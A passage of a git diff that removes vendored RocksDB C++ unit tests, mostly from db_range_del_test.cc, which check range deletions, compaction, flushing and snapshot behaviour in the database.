-    Delete(Key(i));
-  }
-  Flush();
-  dbfull()->TEST_WaitForFlushMemTable();
-  ASSERT_EQ(NumTableFilesAtLevel(0), 2);
-
-  // Restart the DB. Although number of files didn't reach
-  // options.level0_file_num_compaction_trigger, compaction should
-  // still be triggered because of the need-compaction hint.
-  options.disable_auto_compactions = false;
-  Reopen(options);
-  dbfull()->TEST_WaitForCompact();
-  ASSERT_EQ(NumTableFilesAtLevel(0), 0);
-  {
-    SetPerfLevel(kEnableCount);
-    get_perf_context()->Reset();
-    int c = 0;
-    std::unique_ptr<Iterator> iter(db_->NewIterator(ReadOptions()));
-    for (iter->Seek(Key(0)); iter->Valid(); iter->Next()) {
-      c++;
-    }
-    ASSERT_EQ(c, 2);
-    ASSERT_EQ(get_perf_context()->internal_delete_skipped_count, 0);
-    // We iterate every key twice. Is it a bug?
-    ASSERT_LE(get_perf_context()->internal_key_skipped_count, 2);
-    SetPerfLevel(kDisable);
-  }
-}
-
-TEST_F(DBPropertiesTest, EstimateNumKeysUnderflow) {
-  Options options;
-  Reopen(options);
-  Put("foo", "bar");
-  Delete("foo");
-  Delete("foo");
-  uint64_t num_keys = 0;
-  ASSERT_TRUE(dbfull()->GetIntProperty("rocksdb.estimate-num-keys", &num_keys));
-  ASSERT_EQ(0, num_keys);
-}
-
-TEST_F(DBPropertiesTest, EstimateOldestKeyTime) {
-  std::unique_ptr<MockTimeEnv> mock_env(new MockTimeEnv(Env::Default()));
-  uint64_t oldest_key_time = 0;
-  Options options;
-  options.env = mock_env.get();
-
-  // "rocksdb.estimate-oldest-key-time" only available to fifo compaction.
-  mock_env->set_current_time(100);
-  for (auto compaction : {kCompactionStyleLevel, kCompactionStyleUniversal,
-                          kCompactionStyleNone}) {
-    options.compaction_style = compaction;
-    options.create_if_missing = true;
-    DestroyAndReopen(options);
-    ASSERT_OK(Put("foo", "bar"));
-    ASSERT_FALSE(dbfull()->GetIntProperty(
-        DB::Properties::kEstimateOldestKeyTime, &oldest_key_time));
-  }
-
-  options.compaction_style = kCompactionStyleFIFO;
-  options.compaction_options_fifo.ttl = 300;
-  options.compaction_options_fifo.allow_compaction = false;
-  DestroyAndReopen(options);
-
-  mock_env->set_current_time(100);
-  ASSERT_OK(Put("k1", "v1"));
-  ASSERT_TRUE(dbfull()->GetIntProperty(DB::Properties::kEstimateOldestKeyTime,
-                                       &oldest_key_time));
-  ASSERT_EQ(100, oldest_key_time);
-  ASSERT_OK(Flush());
-  ASSERT_EQ("1", FilesPerLevel());
-  ASSERT_TRUE(dbfull()->GetIntProperty(DB::Properties::kEstimateOldestKeyTime,
-                                       &oldest_key_time));
-  ASSERT_EQ(100, oldest_key_time);
-
-  mock_env->set_current_time(200);
-  ASSERT_OK(Put("k2", "v2"));
-  ASSERT_OK(Flush());
-  ASSERT_EQ("2", FilesPerLevel());
-  ASSERT_TRUE(dbfull()->GetIntProperty(DB::Properties::kEstimateOldestKeyTime,
-                                       &oldest_key_time));
-  ASSERT_EQ(100, oldest_key_time);
-
-  mock_env->set_current_time(300);
-  ASSERT_OK(Put("k3", "v3"));
-  ASSERT_OK(Flush());
-  ASSERT_EQ("3", FilesPerLevel());
-  ASSERT_TRUE(dbfull()->GetIntProperty(DB::Properties::kEstimateOldestKeyTime,
-                                       &oldest_key_time));
-  ASSERT_EQ(100, oldest_key_time);
-
-  mock_env->set_current_time(450);
-  ASSERT_OK(dbfull()->CompactRange(CompactRangeOptions(), nullptr, nullptr));
-  ASSERT_EQ("2", FilesPerLevel());
-  ASSERT_TRUE(dbfull()->GetIntProperty(DB::Properties::kEstimateOldestKeyTime,
-                                       &oldest_key_time));
-  ASSERT_EQ(200, oldest_key_time);
-
-  mock_env->set_current_time(550);
-  ASSERT_OK(dbfull()->CompactRange(CompactRangeOptions(), nullptr, nullptr));
-  ASSERT_EQ("1", FilesPerLevel());
-  ASSERT_TRUE(dbfull()->GetIntProperty(DB::Properties::kEstimateOldestKeyTime,
-                                       &oldest_key_time));
-  ASSERT_EQ(300, oldest_key_time);
-
-  mock_env->set_current_time(650);
-  ASSERT_OK(dbfull()->CompactRange(CompactRangeOptions(), nullptr, nullptr));
-  ASSERT_EQ("", FilesPerLevel());
-  ASSERT_FALSE(dbfull()->GetIntProperty(DB::Properties::kEstimateOldestKeyTime,
-                                        &oldest_key_time));
-
-  // Close before mock_env destructs.
-  Close();
-}
-
-#endif  // ROCKSDB_LITE
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-  rocksdb::port::InstallStackTraceHandler();
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
diff --git a/thirdparty/rocksdb/db/db_range_del_test.cc b/thirdparty/rocksdb/db/db_range_del_test.cc
deleted file mode 100644
index 982cbb8..0000000
--- a/thirdparty/rocksdb/db/db_range_del_test.cc
+++ /dev/null
@@ -1,1007 +0,0 @@
-//  Copyright (c) 2016-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#include "db/db_test_util.h"
-#include "port/stack_trace.h"
-#include "util/testutil.h"
-#include "utilities/merge_operators.h"
-
-namespace rocksdb {
-
-class DBRangeDelTest : public DBTestBase {
- public:
-  DBRangeDelTest() : DBTestBase("/db_range_del_test") {}
-
-  std::string GetNumericStr(int key) {
-    uint64_t uint64_key = static_cast<uint64_t>(key);
-    std::string str;
-    str.resize(8);
-    memcpy(&str[0], static_cast<void*>(&uint64_key), 8);
-    return str;
-  }
-};
-
-// PlainTableFactory and NumTableFilesAtLevel() are not supported in
-// ROCKSDB_LITE
-#ifndef ROCKSDB_LITE
-TEST_F(DBRangeDelTest, NonBlockBasedTableNotSupported) {
-  if (!IsMemoryMappedAccessSupported()) {
-    return;
-  }
-  Options opts = CurrentOptions();
-  opts.table_factory.reset(new PlainTableFactory());
-  opts.prefix_extractor.reset(NewNoopTransform());
-  opts.allow_mmap_reads = true;
-  opts.max_sequential_skip_in_iterations = 999999;
-  Reopen(opts);
-
-  ASSERT_TRUE(
-      db_->DeleteRange(WriteOptions(), db_->DefaultColumnFamily(), "dr1", "dr1")
-          .IsNotSupported());
-}
-
-TEST_F(DBRangeDelTest, FlushOutputHasOnlyRangeTombstones) {
-  ASSERT_OK(db_->DeleteRange(WriteOptions(), db_->DefaultColumnFamily(), "dr1",
-                             "dr2"));
-  ASSERT_OK(db_->Flush(FlushOptions()));
-  ASSERT_EQ(1, NumTableFilesAtLevel(0));
-}
-
-TEST_F(DBRangeDelTest, CompactionOutputHasOnlyRangeTombstone) {
-  Options opts = CurrentOptions();
-  opts.disable_auto_compactions = true;
-  opts.statistics = CreateDBStatistics();
-  Reopen(opts);
-
-  // snapshot protects range tombstone from dropping due to becoming obsolete.
-  const Snapshot* snapshot = db_->GetSnapshot();
-  db_->DeleteRange(WriteOptions(), db_->DefaultColumnFamily(), "a", "z");
-  db_->Flush(FlushOptions());
-
-  ASSERT_EQ(1, NumTableFilesAtLevel(0));
-  ASSERT_EQ(0, NumTableFilesAtLevel(1));
-  dbfull()->TEST_CompactRange(0, nullptr, nullptr, nullptr,
-                              true /* disallow_trivial_move */);
-  ASSERT_EQ(0, NumTableFilesAtLevel(0));
-  ASSERT_EQ(1, NumTableFilesAtLevel(1));
-  ASSERT_EQ(0, TestGetTickerCount(opts, COMPACTION_RANGE_DEL_DROP_OBSOLETE));
-  db_->ReleaseSnapshot(snapshot);
-}
-
-TEST_F(DBRangeDelTest, CompactionOutputFilesExactlyFilled) {
-  // regression test for exactly filled compaction output files. Previously
-  // another file would be generated containing all range deletions, which
-  // could invalidate the non-overlapping file boundary invariant.
-  const int kNumPerFile = 4, kNumFiles = 2, kFileBytes = 9 << 10;
-  Options options = CurrentOptions();
-  options.disable_auto_compactions = true;
-  options.level0_file_num_compaction_trigger = kNumFiles;
-  options.memtable_factory.reset(new SpecialSkipListFactory(kNumPerFile));
-  options.num_levels = 2;
-  options.target_file_size_base = kFileBytes;
-  BlockBasedTableOptions table_options;
-  table_options.block_size_deviation = 50;  // each block holds two keys
-  options.table_factory.reset(NewBlockBasedTableFactory(table_options));
-  Reopen(options);
-
-  // snapshot protects range tombstone from dropping due to becoming obsolete.
-  const Snapshot* snapshot = db_->GetSnapshot();
-  db_->DeleteRange(WriteOptions(), db_->DefaultColumnFamily(), Key(0), Key(1));
-
-  Random rnd(301);
-  for (int i = 0; i < kNumFiles; ++i) {
-    std::vector<std::string> values;
-    // Write 12K (4 values, each 3K)
-    for (int j = 0; j < kNumPerFile; j++) {
-      values.push_back(RandomString(&rnd, 3 << 10));
-      ASSERT_OK(Put(Key(i * kNumPerFile + j), values[j]));
-      if (j == 0 && i > 0) {
-        dbfull()->TEST_WaitForFlushMemTable();
-      }
-    }
-  }
-  // put extra key to trigger final flush
-  ASSERT_OK(Put("", ""));
-  dbfull()->TEST_WaitForFlushMemTable();
-  ASSERT_EQ(kNumFiles, NumTableFilesAtLevel(0));
-  ASSERT_EQ(0, NumTableFilesAtLevel(1));
-
-  dbfull()->TEST_CompactRange(0, nullptr, nullptr, nullptr,
-                              true /* disallow_trivial_move */);
-  ASSERT_EQ(0, NumTableFilesAtLevel(0));
-  ASSERT_EQ(2, NumTableFilesAtLevel(1));
-  db_->ReleaseSnapshot(snapshot);
-}
-
-TEST_F(DBRangeDelTest, MaxCompactionBytesCutsOutputFiles) {
-  // Ensures range deletion spanning multiple compaction output files that are
-  // cut by max_compaction_bytes will have non-overlapping key-ranges.
-  // https://github.com/facebook/rocksdb/issues/1778
-  const int kNumFiles = 2, kNumPerFile = 1 << 8, kBytesPerVal = 1 << 12;
-  Options opts = CurrentOptions();
-  opts.comparator = test::Uint64Comparator();
-  opts.disable_auto_compactions = true;
-  opts.level0_file_num_compaction_trigger = kNumFiles;
-  opts.max_compaction_bytes = kNumPerFile * kBytesPerVal;
-  opts.memtable_factory.reset(new SpecialSkipListFactory(kNumPerFile));
-  // Want max_compaction_bytes to trigger the end of compaction output file, not
-  // target_file_size_base, so make the latter much bigger
-  opts.target_file_size_base = 100 * opts.max_compaction_bytes;
-  Reopen(opts);
-
-  // snapshot protects range tombstone from dropping due to becoming obsolete.
-  const Snapshot* snapshot = db_->GetSnapshot();
-
-  // It spans the whole key-range, thus will be included in all output files
-  ASSERT_OK(db_->DeleteRange(WriteOptions(), db_->DefaultColumnFamily(),
-                             GetNumericStr(0),
-                             GetNumericStr(kNumFiles * kNumPerFile - 1)));
-  Random rnd(301);
-  for (int i = 0; i < kNumFiles; ++i) {
-    std::vector<std::string> values;
-    // Write 1MB (256 values, each 4K)
-    for (int j = 0; j < kNumPerFile; j++) {
-      values.push_back(RandomString(&rnd, kBytesPerVal));
-      ASSERT_OK(Put(GetNumericStr(kNumPerFile * i + j), values[j]));
-    }
-    // extra entry to trigger SpecialSkipListFactory's flush
-    ASSERT_OK(Put(GetNumericStr(kNumPerFile), ""));
-    dbfull()->TEST_WaitForFlushMemTable();
-    ASSERT_EQ(i + 1, NumTableFilesAtLevel(0));
-  }
-
-  dbfull()->TEST_CompactRange(0, nullptr, nullptr, nullptr,
-                              true /* disallow_trivial_move */);
-  ASSERT_EQ(0, NumTableFilesAtLevel(0));
-  ASSERT_GE(NumTableFilesAtLevel(1), 2);
-
-  std::vector<std::vector<FileMetaData>> files;
-  dbfull()->TEST_GetFilesMetaData(db_->DefaultColumnFamily(), &files);
-
-  for (size_t i = 0; i < files[1].size() - 1; ++i) {
-    ASSERT_TRUE(InternalKeyComparator(opts.comparator)
-                    .Compare(files[1][i].largest, files[1][i + 1].smallest) <
-                0);
-  }
-  db_->ReleaseSnapshot(snapshot);
-}
-
-TEST_F(DBRangeDelTest, SentinelsOmittedFromOutputFile) {
-  // Regression test for bug where sentinel range deletions (i.e., ones with
-  // sequence number of zero) were included in output files.
-  // snapshot protects range tombstone from dropping due to becoming obsolete.
-  const Snapshot* snapshot = db_->GetSnapshot();
-
-  // gaps between ranges creates sentinels in our internal representation
-  std::vector<std::pair<std::string, std::string>> range_dels = {{"a", "b"}, {"c", "d"}, {"e", "f"}};
-  for (const auto& range_del : range_dels) {
-    ASSERT_OK(db_->DeleteRange(WriteOptions(), db_->DefaultColumnFamily(),
-                               range_del.first, range_del.second));
-  }
-  ASSERT_OK(db_->Flush(FlushOptions()));
-  ASSERT_EQ(1, NumTableFilesAtLevel(0));
-
-  std::vector<std::vector<FileMetaData>> files;
-  dbfull()->TEST_GetFilesMetaData(db_->DefaultColumnFamily(), &files);
-  ASSERT_GT(files[0][0].smallest_seqno, 0);
-
-  db_->ReleaseSnapshot(snapshot);
-}
-
-TEST_F(DBRangeDelTest, FlushRangeDelsSameStartKey) {
-  db_->Put(WriteOptions(), "b1", "val");
-  ASSERT_OK(
-      db_->DeleteRange(WriteOptions(), db_->DefaultColumnFamily(), "a", "c"));
-  db_->Put(WriteOptions(), "b2", "val");
-  ASSERT_OK(
-      db_->DeleteRange(WriteOptions(), db_->DefaultColumnFamily(), "a", "b"));
-  // first iteration verifies query correctness in memtable, second verifies
-  // query correctness for a single SST file
-  for (int i = 0; i < 2; ++i) {
-    if (i > 0) {
-      ASSERT_OK(db_->Flush(FlushOptions()));
-      ASSERT_EQ(1, NumTableFilesAtLevel(0));
-    }
-    std::string value;
-    ASSERT_TRUE(db_->Get(ReadOptions(), "b1", &value).IsNotFound());
-    ASSERT_OK(db_->Get(ReadOptions(), "b2", &value));
-  }
-}
-
-TEST_F(DBRangeDelTest, CompactRangeDelsSameStartKey) {
-  db_->Put(WriteOptions(), "unused", "val");  // prevents empty after compaction
-  db_->Put(WriteOptions(), "b1", "val");
-  ASSERT_OK(db_->Flush(FlushOptions()));
-  ASSERT_OK(
-      db_->DeleteRange(WriteOptions(), db_->DefaultColumnFamily(), "a", "c"));
-  ASSERT_OK(db_->Flush(FlushOptions()));
-  ASSERT_OK(
-      db_->DeleteRange(WriteOptions(), db_->DefaultColumnFamily(), "a", "b"));
-  ASSERT_OK(db_->Flush(FlushOptions()));
-  ASSERT_EQ(3, NumTableFilesAtLevel(0));
-
-  for (int i = 0; i < 2; ++i) {
-    if (i > 0) {
-      dbfull()->TEST_CompactRange(0, nullptr, nullptr, nullptr,
-                                  true /* disallow_trivial_move */);
-      ASSERT_EQ(0, NumTableFilesAtLevel(0));
-      ASSERT_EQ(1, NumTableFilesAtLevel(1));
-    }
-    std::string value;
-    ASSERT_TRUE(db_->Get(ReadOptions(), "b1", &value).IsNotFound());
-  }
-}
-#endif  // ROCKSDB_LITE
-
-TEST_F(DBRangeDelTest, FlushRemovesCoveredKeys) {
-  const int kNum = 300, kRangeBegin = 50, kRangeEnd = 250;
-  Options opts = CurrentOptions();
-  opts.comparator = test::Uint64Comparator();
-  Reopen(opts);
-
-  // Write a third before snapshot, a third between snapshot and tombstone, and
-  // a third after the tombstone. Keys older than snapshot or newer than the
-  // tombstone should be preserved.
-  const Snapshot* snapshot = nullptr;
-  for (int i = 0; i < kNum; ++i) {
-    if (i == kNum / 3) {
-      snapshot = db_->GetSnapshot();
-    } else if (i == 2 * kNum / 3) {
-      db_->DeleteRange(WriteOptions(), db_->DefaultColumnFamily(),
-                       GetNumericStr(kRangeBegin), GetNumericStr(kRangeEnd));
-    }
-    db_->Put(WriteOptions(), GetNumericStr(i), "val");
-  }
-  db_->Flush(FlushOptions());
-
-  for (int i = 0; i < kNum; ++i) {
-    ReadOptions read_opts;
-    read_opts.ignore_range_deletions = true;
-    std::string value;
-    if (i < kRangeBegin || i > kRangeEnd || i < kNum / 3 || i >= 2 * kNum / 3) {
-      ASSERT_OK(db_->Get(read_opts, GetNumericStr(i), &value));
-    } else {
-      ASSERT_TRUE(db_->Get(read_opts, GetNumericStr(i), &value).IsNotFound());
-    }
-  }
-  db_->ReleaseSnapshot(snapshot);
-}
-
-// NumTableFilesAtLevel() is not supported in ROCKSDB_LITE
-#ifndef ROCKSDB_LITE
-TEST_F(DBRangeDelTest, CompactionRemovesCoveredKeys) {
-  const int kNumPerFile = 100, kNumFiles = 4;
-  Options opts = CurrentOptions();
-  opts.comparator = test::Uint64Comparator();
-  opts.disable_auto_compactions = true;
-  opts.memtable_factory.reset(new SpecialSkipListFactory(kNumPerFile));
-  opts.num_levels = 2;
-  opts.statistics = CreateDBStatistics();
-  Reopen(opts);
-
-  for (int i = 0; i < kNumFiles; ++i) {
-    if (i > 0) {
-      // range tombstone covers first half of the previous file
-      db_->DeleteRange(WriteOptions(), db_->DefaultColumnFamily(),
-                       GetNumericStr((i - 1) * kNumPerFile),
-                       GetNumericStr((i - 1) * kNumPerFile + kNumPerFile / 2));
-    }
-    // Make sure a given key appears in each file so compaction won't be able to
-    // use trivial move, which would happen if the ranges were non-overlapping.
-    // Also, we need an extra element since flush is only triggered when the
-    // number of keys is one greater than SpecialSkipListFactory's limit.
-    // We choose a key outside the key-range used by the test to avoid conflict.
-    db_->Put(WriteOptions(), GetNumericStr(kNumPerFile * kNumFiles), "val");
-
-    for (int j = 0; j < kNumPerFile; ++j) {
-      db_->Put(WriteOptions(), GetNumericStr(i * kNumPerFile + j), "val");
-    }
-    dbfull()->TEST_WaitForFlushMemTable();
-    ASSERT_EQ(i + 1, NumTableFilesAtLevel(0));
-  }
-  db_->CompactRange(CompactRangeOptions(), nullptr, nullptr);
-  ASSERT_EQ(0, NumTableFilesAtLevel(0));
-  ASSERT_GT(NumTableFilesAtLevel(1), 0);
-  ASSERT_EQ((kNumFiles - 1) * kNumPerFile / 2,
-            TestGetTickerCount(opts, COMPACTION_KEY_DROP_RANGE_DEL));
-
-  for (int i = 0; i < kNumFiles; ++i) {
-    for (int j = 0; j < kNumPerFile; ++j) {
-      ReadOptions read_opts;
-      read_opts.ignore_range_deletions = true;
-      std::string value;
-      if (i == kNumFiles - 1 || j >= kNumPerFile / 2) {
-        ASSERT_OK(
-            db_->Get(read_opts, GetNumericStr(i * kNumPerFile + j), &value));
-      } else {
-        ASSERT_TRUE(
-            db_->Get(read_opts, GetNumericStr(i * kNumPerFile + j), &value)
-                .IsNotFound());
-      }
-    }
-  }
-}
-
-TEST_F(DBRangeDelTest, ValidLevelSubcompactionBoundaries) {
-  const int kNumPerFile = 100, kNumFiles = 4, kFileBytes = 100 << 10;
-  Options options = CurrentOptions();
-  options.disable_auto_compactions = true;
-  options.level0_file_num_compaction_trigger = kNumFiles;
-  options.max_bytes_for_level_base = 2 * kFileBytes;
-  options.max_subcompactions = 4;
-  options.memtable_factory.reset(new SpecialSkipListFactory(kNumPerFile));
-  options.num_levels = 3;
-  options.target_file_size_base = kFileBytes;
-  options.target_file_size_multiplier = 1;
-  Reopen(options);
-
-  Random rnd(301);
-  for (int i = 0; i < 2; ++i) {
-    for (int j = 0; j < kNumFiles; ++j) {
-      if (i > 0) {
-        // delete [95,105) in two files, [295,305) in next two
-        int mid = (j + (1 - j % 2)) * kNumPerFile;
-        db_->DeleteRange(WriteOptions(), db_->DefaultColumnFamily(),
-                         Key(mid - 5), Key(mid + 5));
-      }
-      std::vector<std::string> values;
-      // Write 100KB (100 values, each 1K)
-      for (int k = 0; k < kNumPerFile; k++) {
-        values.push_back(RandomString(&rnd, 990));
-        ASSERT_OK(Put(Key(j * kNumPerFile + k), values[k]));
-      }
-      // put extra key to trigger flush
-      ASSERT_OK(Put("", ""));
-      dbfull()->TEST_WaitForFlushMemTable();
-      if (j < kNumFiles - 1) {
-        // background compaction may happen early for kNumFiles'th file
-        ASSERT_EQ(NumTableFilesAtLevel(0), j + 1);
-      }
-      if (j == options.level0_file_num_compaction_trigger - 1) {
-        // When i == 1, compaction will output some files to L1, at which point
-        // L1 is not bottommost so range deletions cannot be compacted away. The
-        // new L1 files must be generated with non-overlapping key ranges even
-        // though multiple subcompactions see the same ranges deleted, else an
-        // assertion will fail.
-        //
-        // Only enable auto-compactions when we're ready; otherwise, the
-        // oversized L0 (relative to base_level) causes the compaction to run
-        // earlier.
-        ASSERT_OK(db_->EnableAutoCompaction({db_->DefaultColumnFamily()}));
-        dbfull()->TEST_WaitForCompact();
-        ASSERT_OK(db_->SetOptions(db_->DefaultColumnFamily(),
-                                  {{"disable_auto_compactions", "true"}}));
-        ASSERT_EQ(NumTableFilesAtLevel(0), 0);
-        ASSERT_GT(NumTableFilesAtLevel(1), 0);
-        ASSERT_GT(NumTableFilesAtLevel(2), 0);
-      }
-    }
-  }
-}
-
-TEST_F(DBRangeDelTest, ValidUniversalSubcompactionBoundaries) {
-  const int kNumPerFile = 100, kFilesPerLevel = 4, kNumLevels = 4;
-  Options options = CurrentOptions();
-  options.compaction_options_universal.min_merge_width = kFilesPerLevel;
-  options.compaction_options_universal.max_merge_width = kFilesPerLevel;
-  options.compaction_options_universal.size_ratio = 10;
-  options.compaction_style = kCompactionStyleUniversal;
-  options.level0_file_num_compaction_trigger = kFilesPerLevel;
-  options.max_subcompactions = 4;
-  options.memtable_factory.reset(new SpecialSkipListFactory(kNumPerFile));
-  options.num_levels = kNumLevels;
-  options.target_file_size_base = kNumPerFile << 10;
-  options.target_file_size_multiplier = 1;
-  Reopen(options);
-
-  Random rnd(301);
-  for (int i = 0; i < kNumLevels - 1; ++i) {
-    for (int j = 0; j < kFilesPerLevel; ++j) {
-      if (i == kNumLevels - 2) {
-        // insert range deletions [95,105) in two files, [295,305) in next two
-        // to prepare L1 for later manual compaction.
-        int mid = (j + (1 - j % 2)) * kNumPerFile;
-        db_->DeleteRange(WriteOptions(), db_->DefaultColumnFamily(),
-                         Key(mid - 5), Key(mid + 5));
-      }
-      std::vector<std::string> values;
-      // Write 100KB (100 values, each 1K)
-      for (int k = 0; k < kNumPerFile; k++) {
-        values.push_back(RandomString(&rnd, 990));
-        ASSERT_OK(Put(Key(j * kNumPerFile + k), values[k]));
-      }
-      // put extra key to trigger flush
-      ASSERT_OK(Put("", ""));
-      dbfull()->TEST_WaitForFlushMemTable();
-      if (j < kFilesPerLevel - 1) {
-        // background compaction may happen early for kFilesPerLevel'th file
-        ASSERT_EQ(NumTableFilesAtLevel(0), j + 1);
-      }
-    }
-    dbfull()->TEST_WaitForCompact();
-    ASSERT_EQ(NumTableFilesAtLevel(0), 0);
-    ASSERT_GT(NumTableFilesAtLevel(kNumLevels - 1 - i), kFilesPerLevel - 1);
-  }
-  // Now L1-L3 are full, when we compact L1->L2 we should see (1) subcompactions
-  // happen since input level > 0; (2) range deletions are not dropped since
-  // output level is not bottommost. If no file boundary assertion fails, that
-  // probably means universal compaction + subcompaction + range deletion are
-  // compatible.
-  ASSERT_OK(dbfull()->RunManualCompaction(
-      reinterpret_cast<ColumnFamilyHandleImpl*>(db_->DefaultColumnFamily())
-          ->cfd(),
-      1 /* input_level */, 2 /* output_level */, 0 /* output_path_id */,
-      nullptr /* begin */, nullptr /* end */, true /* exclusive */,
-      true /* disallow_trivial_move */));
-}
-#endif  // ROCKSDB_LITE
-
-TEST_F(DBRangeDelTest, CompactionRemovesCoveredMergeOperands) {
-  const int kNumPerFile = 3, kNumFiles = 3;
-  Options opts = CurrentOptions();
-  opts.disable_auto_compactions = true;
-  opts.memtable_factory.reset(new SpecialSkipListFactory(2 * kNumPerFile));
-  opts.merge_operator = MergeOperators::CreateUInt64AddOperator();
-  opts.num_levels = 2;
-  Reopen(opts);
-
-  // Iterates kNumFiles * kNumPerFile + 1 times since flushing the last file
-  // requires an extra entry.
-  for (int i = 0; i <= kNumFiles * kNumPerFile; ++i) {
-    if (i % kNumPerFile == 0 && i / kNumPerFile == kNumFiles - 1) {
-      // Delete merge operands from all but the last file
-      db_->DeleteRange(WriteOptions(), db_->DefaultColumnFamily(), "key",
-                       "key_");
-    }
-    std::string val;
-    PutFixed64(&val, i);
-    db_->Merge(WriteOptions(), "key", val);
-    // we need to prevent trivial move using Puts so compaction will actually
-    // process the merge operands.
-    db_->Put(WriteOptions(), "prevent_trivial_move", "");
-    if (i > 0 && i % kNumPerFile == 0) {
-      dbfull()->TEST_WaitForFlushMemTable();
-    }
-  }
-
-  ReadOptions read_opts;
-  read_opts.ignore_range_deletions = true;
-  std::string expected, actual;
-  ASSERT_OK(db_->Get(read_opts, "key", &actual));
-  PutFixed64(&expected, 45);  // 1+2+...+9
-  ASSERT_EQ(expected, actual);
-
-  db_->CompactRange(CompactRangeOptions(), nullptr, nullptr);
-
-  expected.clear();
-  ASSERT_OK(db_->Get(read_opts, "key", &actual));
-  uint64_t tmp;
-  Slice tmp2(actual);
-  GetFixed64(&tmp2, &tmp);
-  PutFixed64(&expected, 30);  // 6+7+8+9 (earlier operands covered by tombstone)
-  ASSERT_EQ(expected, actual);
-}
-
-// NumTableFilesAtLevel() is not supported in ROCKSDB_LITE
-#ifndef ROCKSDB_LITE
-TEST_F(DBRangeDelTest, ObsoleteTombstoneCleanup) {
-  // During compaction to bottommost level, verify range tombstones older than
-  // the oldest snapshot are removed, while others are preserved.
-  Options opts = CurrentOptions();
-  opts.disable_auto_compactions = true;
-  opts.num_levels = 2;
-  opts.statistics = CreateDBStatistics();
-  Reopen(opts);
-
-  db_->DeleteRange(WriteOptions(), db_->DefaultColumnFamily(), "dr1",
-                   "dr1");  // obsolete after compaction
-  db_->Put(WriteOptions(), "key", "val");
-  db_->Flush(FlushOptions());
-  const Snapshot* snapshot = db_->GetSnapshot();
-  db_->DeleteRange(WriteOptions(), db_->DefaultColumnFamily(), "dr2",
-                   "dr2");  // protected by snapshot
-  db_->Put(WriteOptions(), "key", "val");
-  db_->Flush(FlushOptions());
-
-  ASSERT_EQ(2, NumTableFilesAtLevel(0));
-  ASSERT_EQ(0, NumTableFilesAtLevel(1));
-  db_->CompactRange(CompactRangeOptions(), nullptr, nullptr);
-  ASSERT_EQ(0, NumTableFilesAtLevel(0));
-  ASSERT_EQ(1, NumTableFilesAtLevel(1));
-  ASSERT_EQ(1, TestGetTickerCount(opts, COMPACTION_RANGE_DEL_DROP_OBSOLETE));
-
-  db_->ReleaseSnapshot(snapshot);
-}
-
-TEST_F(DBRangeDelTest, TableEvictedDuringScan) {
-  // The RangeDelAggregator holds pointers into range deletion blocks created by
-  // table readers. This test ensures the aggregator can still access those
-  // blocks even if it outlives the table readers that created them.
-  //
-  // DBIter always keeps readers open for L0 files. So, in order to test
-  // aggregator outliving reader, we need to have deletions in L1 files, which
-  // are opened/closed on-demand during the scan. This is accomplished by
-  // setting kNumRanges > level0_stop_writes_trigger, which prevents deletions
-  // from all lingering in L0 (there is at most one range deletion per L0 file).
-  //
-  // The first L1 file will contain a range deletion since its begin key is 0.
-  // SeekToFirst() references that table's reader and adds its range tombstone
-  // to the aggregator. Upon advancing beyond that table's key-range via Next(),
-  // the table reader will be unreferenced by the iterator. Since we manually
-  // call Evict() on all readers before the full scan, this unreference causes
-  // the reader's refcount to drop to zero and thus be destroyed.
-  //
-  // When it is destroyed, we do not remove its range deletions from the
-  // aggregator. So, subsequent calls to Next() must be able to use these
-  // deletions to decide whether a key is covered. This will work as long as
-  // the aggregator properly references the range deletion block.
-  const int kNum = 25, kRangeBegin = 0, kRangeEnd = 7, kNumRanges = 5;
-  Options opts = CurrentOptions();
-  opts.comparator = test::Uint64Comparator();
-  opts.level0_file_num_compaction_trigger = 4;
-  opts.level0_stop_writes_trigger = 4;
-  opts.memtable_factory.reset(new SpecialSkipListFactory(1));
-  opts.num_levels = 2;
-  BlockBasedTableOptions bbto;
-  bbto.cache_index_and_filter_blocks = true;
-  bbto.block_cache = NewLRUCache(8 << 20);
-  opts.table_factory.reset(NewBlockBasedTableFactory(bbto));
-  Reopen(opts);
-
-  // Hold a snapshot so range deletions can't become obsolete during compaction
-  // to bottommost level (i.e., L1).
-  const Snapshot* snapshot = db_->GetSnapshot();
-  for (int i = 0; i < kNum; ++i) {
-    db_->Put(WriteOptions(), GetNumericStr(i), "val");
-    if (i > 0) {
-      dbfull()->TEST_WaitForFlushMemTable();
-    }
-    if (i >= kNum / 2 && i < kNum / 2 + kNumRanges) {
-      db_->DeleteRange(WriteOptions(), db_->DefaultColumnFamily(),
-                       GetNumericStr(kRangeBegin), GetNumericStr(kRangeEnd));
-    }
-  }
-  // Must be > 1 so the first L1 file can be closed before scan finishes
-  dbfull()->TEST_WaitForCompact();
-  ASSERT_GT(NumTableFilesAtLevel(1), 1);
-  std::vector<uint64_t> file_numbers = ListTableFiles(env_, dbname_);
-
-  ReadOptions read_opts;
-  auto* iter = db_->NewIterator(read_opts);
-  int expected = kRangeEnd;
-  iter->SeekToFirst();
-  for (auto file_number : file_numbers) {
-    // This puts table caches in the state of being externally referenced only
-    // so they are destroyed immediately upon iterator unreferencing.
-    TableCache::Evict(dbfull()->TEST_table_cache(), file_number);
-  }
-  for (; iter->Valid(); iter->Next()) {
-    ASSERT_EQ(GetNumericStr(expected), iter->key());
-    ++expected;
-    // Keep clearing block cache's LRU so range deletion block can be freed as
-    // soon as its refcount drops to zero.
-    bbto.block_cache->EraseUnRefEntries();
-  }
-  ASSERT_EQ(kNum, expected);
-  delete iter;
-  db_->ReleaseSnapshot(snapshot);
-}
-
-TEST_F(DBRangeDelTest, GetCoveredKeyFromMutableMemtable) {
-  db_->Put(WriteOptions(), "key", "val");
-  ASSERT_OK(
-      db_->DeleteRange(WriteOptions(), db_->DefaultColumnFamily(), "a", "z"));
-
-  ReadOptions read_opts;
-  std::string value;
-  ASSERT_TRUE(db_->Get(read_opts, "key", &value).IsNotFound());
-}
-
-TEST_F(DBRangeDelTest, GetCoveredKeyFromImmutableMemtable) {
-  Options opts = CurrentOptions();
-  opts.max_write_buffer_number = 3;
-  opts.min_write_buffer_number_to_merge = 2;
-  // SpecialSkipListFactory lets us specify maximum number of elements the
-  // memtable can hold. It switches the active memtable to immutable (flush is
-  // prevented by the above options) upon inserting an element that would
